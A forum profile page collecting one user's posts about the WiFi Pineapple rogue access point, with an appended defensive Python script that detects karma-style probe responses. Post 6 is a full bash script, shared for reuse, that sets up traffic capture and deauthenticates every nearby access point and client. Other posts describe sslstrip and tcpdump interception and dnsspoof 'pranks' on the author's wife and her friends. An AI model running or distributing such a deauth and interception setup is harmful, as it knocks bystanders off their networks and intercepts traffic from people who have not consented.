Everything posted by telot

  1. Do you have any spare access points, so that you can turn your meraki's AirMarshal mode on to continuous scan? If not, do you have AirMarshal on opportunistic scan? I haven't yet tested my new meraki (I got the free one) with the pineapple, to see if it's detected, but that might be one way to bust the culprit. telot
  2. mreidiv: First off, good to see you posting again! It's been a while, so welcome back to the community. Second, for advice on ssmtp, you might find value in my post on the subject: http://forums.hak5.org/index.php?/topic/25966-sent-from-my-pineapple/?hl=ssmtp Enjoy telot
  3. It seems that you get to a point where it's not what you know, but how good at googling you are. No one can know everything anymore (Aristotle was heralded as the last man to know everything), now the name of the game is who can access the information best/quickest/most efficiently. There's tons of good articles about google-fu you can read up on to bolster your skills. Modifiers like site, type, file, +, - are all amazing tools to help you narrow down the results to exactly what you're looking for. telot
  4. Over 112,000 views...I'd say a lot of people read these things! telot
  5. Ooo! I have the best answer? Mr. P, where do I find the reward pastries? ;) Glad I could help telot
  6. Here's a script I made way back in 2011. It was meant to be used with the mark3, but I don't think anything has changed. This script makes some assumptions about your setup that you should verify/modify - it's all mentioned in the first blahb of commented text. Hope it helps

      ```
      #!/bin/sh
      #telot presents....:::drum roll:::
      #One wicked ass nasty script that automates the ICS for the pineapple, begins packet capturing, and deauths every access point/client nearby! Enjoy!
      #Note that this script makes quite a few assumptions. They are:
      #You are using backtrack5R1.
      #Your interface that is connecting to the internet is wlan0
      #Your interface that is connecting to the pineapple is eth0
      #You have a alfa realtek usb card capable of monitor mode plugged in.
      #You have airdrop-ng installed and configured. This is a bit of a pita. If you don't want the deauth functions, comment it out (it's at the very bottom of this script).
      #You have not run wp3.sh or any other network configuration stuff.
      #You have your pineapple configured to autostart karma at bootup.
      #This script is meant to run on your laptop upon bootup.
      #
      #Also in this script, I'm using my smartphone's wifi hotspot feature, and that is why I'm using wpa_supplicant.
      #So the internet I'm serving up in my pentest lab is actually run through my cellphone.
      #So if you're dumb enough to do this in public to real people, use the local wifi. You don't want "real" targets eating up your monthly cellphone bandwidth.
      #
      #
      #Disclaimer: Herp a derp don't use this in public. Don't use this on anyone but your wife. Don't invade other peoples privacy. Don't be an asshole. With great power comes great...blah blah blah
      #
      #
      #I'm keeping most configuration and capture files on the desktop for ease.
      cd /root/Desktop/
      #Again, I'm using wpa because I'm running this through my cellphone's hotspot. Remove the wpa_supplicant line and replace it with the below commented line.
      #iwconfig wlan0 essid EssidOfAPyouWantToUse
      wpa_supplicant -B -Dwext -i wlan0 -c Jack.conf
      dhclient wlan0
      #Now I just copy pasta'd most of this from the wp3.sh - I use all defaults for my setup, if you do not, change as necessary.
      #Bring up Ethernet Interface directly connected to Pineapple
      ifconfig eth0 172.16.42.42 netmask 255.255.255.0 up
      # Enable IP Forwarding
      echo '1' > /proc/sys/net/ipv4/ip_forward
      echo -n "IP Forwarding enabled. /proc/sys/net/ipv4/ip_forward set to "
      cat /proc/sys/net/ipv4/ip_forward
      #clear chains and rules
      iptables -X
      iptables -F
      echo iptables chains and rules cleared
      #setup IP forwarding
      iptables -A FORWARD -i wlan0 -o wlan0 -s 172.16.42.0/24 -m state --state NEW -j ACCEPT
      iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
      iptables -A POSTROUTING -t nat -j MASQUERADE
      echo IP Forwarding Enabled
      #remove default route
      route del default
      echo Default route removed
      #add default gateway
      route add default gw 192.168.1.1 wlan0
      echo Pineapple Default Gateway Configured
      #instructions
      #echo All set. Now on the Pineapple issue: route add default gw $pineapplehostip br-lan
      ping -c3 172.16.42.1
      if [ $? -eq 0 ]; then
          echo "ICS configuration successful."
          #echo "Issuing on Pineapple: route add default gw $pineapplehostip br-lan"
          #echo " ssh root@$pineappleip 'route add default gw '$pineapplehostip' br-lan'"
          #echo "Enter Pineapple password if prompted"
          #ssh root@$pineappleip 'route add default gw '$pineapplehostip' br-lan'
      fi
      echo ""
      echo "Browse to http://172.16.42.1/pineapple -- Happy Hacking!"
      echo ""
      #Now on to the fun stuff!
      #
      #
      #
      #Now we autostart wireshark and begin capturing the pineapple traffic. I use screen -d -m to hide the console, as for some reason my wireshark is bugged out and hangs a bit.
      #Remember to screen -r back to it and get rid of it when you're done.
      screen -d -m wireshark -i eth0 -k -w sharkcap &
      #This next section requires an additional wifi card that supports monitor mode. I have a usb alfa realtek one (similar to those found in the hakshop).
      #This is also created in a detached screen. So remember to cleanup when you're done!
      #
      #
      #Now we deauth every access point around us. Make sure to set a conf file (in my case, I call it yourescrewed.conf) for airdrop with your allows and denys.
      #I set mine to allow the pineapple & my hotspot and deny everyone else.
      ifconfig wlan1 up
      airmon-ng start wlan1
      cd /pentest/wireless/airdrop-ng/
      screen -d -m airodump-ng mon0 -w capfile --output-format csv
      sleep 20
      python airdrop-ng -i mon0 -t capfile-01.csv -r yourescrewed.conf
      ```

      telot
  7. I just signed up for the security tube course. It's pretty good, but Vivek is definitely catering to those who already know how to program...which sucks because I don't (other than some complex bash scripting...). He kind of breezes through the beginner stuff, where I would prefer a little more detailed instruction. I'm supplementing it with learnpython.org and other free sites. I just love Vivek...he might not be trying to be funny, but he gets a few laughs out of me every time regardless. "Halo Security Tube and velcome to the Ess Pee Ess See tutorial course" telot
  8. I think I read something on hacker news last night on the plane about them taking it semi-opensource. Because he is so hated by so many, people are stepping up and poking holes through all their code to show what a blowhard he is, but mega is turning it around and fixing it right away. It's kinda cool how they're taking lemons and making it lemonade. I used megaupload all the time - back then it really did fix a problem I had (sending large files via email). Now I've got so many more legit options (dropbox, google drive, or just throw it on a VPS webserver) I really don't see a need for it anymore. Then again, 50GB FREE is pretty huge... telot
  9. Badass! I was just looking into porting the whole 'use gchat as an easy remote shell into your raspberry pi' onto the pineapple, but this effectively does the same thing but without the reliance on gchat (of which there aren't many good client options on iOS). This looks quite awesome newbi3! Gtalk remote shell hack for raspberry pi can be found here: http://mitchtech.net/raspberry-pi-google-talk-robot/ telot
  10. I've done guides for both of those things. You'll find them on the wiki http://cloud.wifipineapple.com/wiki/doku.php telot
  11. Looks awesome Whistle Master! I've been waiting for this one so long I made a faux-interceptor with my raspberry pi, but I'd so much rather use the mark4 hardware. Your contributions make the pineapple what it is WM, thanks again. telot
  12. Badass! I'll be loading it up today! Thanks WM and Moriarty! telot
  13. Maybe check your .bash_history file? I'm not sure if the history is written upon execution of the command, or after the completion of it though... telot
  14. I like it alfa147x! It's very clean. Also, while the default black and green does score hacker points with fellow security enthusiasts, it does look quite suspicious to the ignorant masses. While I don't use the gui much at all, I have my pineapple email me with its status every 10 mins (checking emails on your phone is ultra-lowkey in public!). For those who do use the gui in public, your css looks like any other dashboard you'd find for various web services. Very nice! telot
  15. I've run into that too sublime - sometimes it's better to offload some of the more intensive things to a proper computer, and leave the pineapple to do what it does best :) telot
  16. You got it now! The sniffing won't be automatic, unless you set a script to start it automatically upon bootup or button press (as I do). I run tcpdump and sslstrip - you can look up some of my scripts that I use on the jasager forum. Most of the things you want to do are available, but they need to be added via opkg or the 'pineapple bar' if you want a gui. You don't need to target a client like cain, but you can filter for certain things with tcpdump of course. As for the attacks you mention, ettercap is not working yet, but whistlemaster and digininja are working on something along those lines. arpspoof is unnecessary, since you're already the man in the middle. hamster&ferret, I'm really not sure - I know there's been mention of it in the past, so maybe search the forums for any info regarding those tools. I mainly use sslstrip + tcpdump for my applications - or dnsspoof when I'm pulling some pranks on my wife and her friends hehe. It is always great to learn new things, and we're always glad to have more users and contributors! Word to the wise though, if you have any additional questions regarding the pineapple, please post in the Jasager forums. That's where all the pineapple experts reside ;) telot
  17. It doesn't actually "steal" the already connected computers. When the computer boots up or the wifi card is turned on, it sends out probe requests. It says "HEY GUISE! I'M LOOKING FOR ATT_WIFI and BOINGO HOTSPOT" because it has remembered those. If the pineapple hears that request before any legit att_wifi or boingo hotspot access points hear it, it will respond with "YEAH d00d, right here! Connect to me br0!". Apparently the pineapple is a kind of frat jock today. Now, if paired with an extra alfa wifi card, the pineapple can deauth the legit access points nearby. If you deauth well enough (I like to deauth the living daylights out of my legit APs - I find great joy in it haha) the legit devices connected to that AP will start looking for a new one, as they've now been kicked off. That's when the pineapple will say "Well bud, you can connect to me instead!" I'm not sure about the iphone tethering - maybe? You can provide it internet via a normal router, as long as it's configured properly. telot
  18. My pleasure Thetra - good luck! Pwnd2Pwnr: I'd guess it's also compatible with alfa's other routes (the NHA for example), but the 036H is what they recommend and is what is apparently most supported. telot
  19. Eagle nest monitoring is something I can totally get behind! According to amazon (the first hit on google: http://www.amazon.com/Alfa-R36-Repeater-Extender-AWUS036H/dp/B004ZF0I3U), you need to also pair this with an AWUS036H to make it an extender. So the wifi comes in on the 036H and goes back out on the R36. This can totally be done with solar/batts setup. The R36 accepts a 12V input. What we do in my job is use 6V deep cycle marine batteries in series to make 12V (http://www.zbattery.com/Connecting-Batteries-in-Series-or-Parallel) as that is the best for longevity and AmpHour per dollar. As for what sized panel you'll need - add up the power usage of the R36 + 036H and consult an online solar panel calculator. Since you're in Norway and it's currently winter in the northern hemisphere, if the calc doesn't take location into consideration, go for an additional 30% in wattage. Hell, add 50% for good measure and be sure to point the panel south. In return for this wealth of knowledge (I deal with solar/batts on a daily basis for my job) I'll accept a link to the eagle monitoring webcam :D telot
  20. Damn! Thanks for linking...looks like my personal 3 wrt54's will be getting pen tested in ~2 weeks! telot
  21. I heard from Mr. P that he was having some database issues with other threads - could this be another case of corrupted information? telot
  22. I'd instead recommend CrashPlan. Darren uses it. I use it. Check them out. They are also unlimited, and also have ridic encryption. telot
  23. An rfcat/cc1111/toorcon14 badge forum would be awesome as well! Or maybe just a software defined radio forum. Either way there's very little community-related stuff (besides an irc full of lurkers) for the SDR stuff... telot
  24. First off, Barry, what are you holding out on us dude? What are those things and for the love of god take my money NOW. They look like Sharp made badass zipit's on crack! Anyways, what you're looking for Seek0380, is a WIPS (or really WIDS) - a Wireless Intrusion Detection/Prevention System. That is almost exactly opposite of what the pineapple is/does. The pineapple is by very definition a rogue access point, which is exactly what WIPS detect and contain. Meraki has a free access point you can get by watching one of their webinars. It has a feature called Air Marshal, which is WIPS. Get one of those for sure. Keep in mind though, in my initial testing the meraki has not yet detected a karma'd rogue access point hehe. It does however detect every other legit access point in my house/neighborhood. If you want to learn about wifi and get to know the low-ish level stuff, you can do the same thing with an Alfa card (or the pineapple) in monitor mode. This is the fun/cool/hackerish way. I would highly recommend doing it with an alfa card, as it's much more supported, and that way you don't have to mess with the pineapple's workings (pass it along to a friend who will use it for what it's intended instead :).
      Step 1: Plug in Alfa AWUS036H to laptop
      Step 2: Open up virtual machine running Backtrack
      Step 3: Forward the alfa to the virtual machine (the alfa may show up as Realtek)
      Step 4: Open terminal and type: airmon-ng start wlan0
      Step 5: Type in airodump-ng mon0
      Step 6: Enjoy seeing every access point (hidden ssid or not) within range
      telot
  25. Well, what help do you need? Be more specific! telot
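
A defender-side illustration of the karma behaviour described in the posts above (one access point answering probe requests for whatever SSID a client asks for), added here as an example and not part of telot's posts: it flags any BSSID that sends probe responses for several different SSIDs within a short window. The record format, the threshold of three SSIDs, the 60-second window, the function names and all sample addresses are assumptions constructed for illustration.

```python
from collections import defaultdict

# Constructed sample: "seconds,frame_type,bssid,ssid" lines, as a monitor-mode
# capture might be summarised. Not real traffic.
SAMPLE = """\
0.10,probe-resp,00:11:22:33:44:55,HomeNet
0.40,probe-resp,02:aa:bb:cc:dd:ee,ATT_WIFI
1.20,probe-resp,02:aa:bb:cc:dd:ee,BOINGO HOTSPOT
1.90,beacon,00:11:22:33:44:55,HomeNet
2.30,probe-resp,02:aa:bb:cc:dd:ee,CoffeeShop
3.00,probe-resp,66:77:88:99:aa:bb,Office
75.00,probe-resp,66:77:88:99:aa:bb,Office-Guest
"""

def parse(text):
    """Yield (time, type, bssid, ssid) tuples; skip malformed lines."""
    for line in text.splitlines():
        parts = line.split(",", 3)   # an SSID may itself contain commas
        if len(parts) != 4:
            continue
        try:
            ts = float(parts[0])
        except ValueError:
            continue
        yield ts, parts[1], parts[2].lower(), parts[3]

def karma_suspects(frames, min_ssids=3, window=60.0, allow=()):
    """Return {bssid: sorted SSIDs} for every BSSID that answered for at
    least min_ssids distinct SSIDs inside any span of `window` seconds.
    `allow` lists known-good BSSIDs (lowercase) to ignore."""
    seen = defaultdict(list)         # bssid -> [(time, ssid)]
    for ts, ftype, bssid, ssid in frames:
        if ftype == "probe-resp" and ssid and bssid not in allow:
            seen[bssid].append((ts, ssid))
    suspects = {}
    for bssid, events in seen.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # slide the window start forward until it spans <= window seconds
            while events[end][0] - events[start][0] > window:
                start += 1
            ssids = {s for _, s in events[start:end + 1]}
            if len(ssids) >= min_ssids:
                suspects[bssid] = sorted(ssids)
                break
    return suspects

if __name__ == "__main__":
    for bssid, ssids in karma_suspects(parse(SAMPLE)).items():
        print(bssid, "answered for", ssids)
```

A legitimate access point normally answers only for the SSIDs it is configured with, so the threshold and the allowlist need tuning to the environment being monitored.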